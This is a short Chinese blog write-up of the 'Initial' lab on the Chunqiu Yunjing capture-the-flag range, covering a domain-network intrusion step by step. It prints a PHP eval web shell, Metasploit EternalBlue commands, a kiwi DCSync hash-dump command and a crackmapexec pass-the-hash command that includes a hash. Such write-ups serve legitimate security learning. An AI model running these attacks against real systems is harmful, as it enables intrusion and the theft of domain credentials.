Skip to content

春秋云镜-Initial

约 430 字大约 1 分钟

内网

2025-02-22

前言

其实这个才是真正的入门?纯脚本小子,nday 你就打吧

flag01

直接 thinkphp 工具一把梭,getshell ,上蚁剑,但只是 www-data 权限

image-20250221165121953

sudo -l 一下,发现可以 mysql 提权读 root 目录下的 flag

image-20250221165954054

flag02

在前面那个基础去上代理和 fscan ,又扫出个信呼oa nday,直接打,好无聊()

image-20250221170443251

shell.php
<?php eval($_GET["1"]);?>

image-20250221171137181

flag03

直接扫到了永恒之蓝,msf 开打,中间代理不太稳定可能会有点问题得多等一下

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

image-20250221171613637

拿集成的 kiwi 收集 hash

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image-20250221171652428

用 crackmapexec 打 PTH

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20250221171856303

作为第一次接触域来说应该很简单好玩,里面的具体知识一边学一边写,不专门放在靶场记录里了

参考文章

fushuling-Initial

大头SEC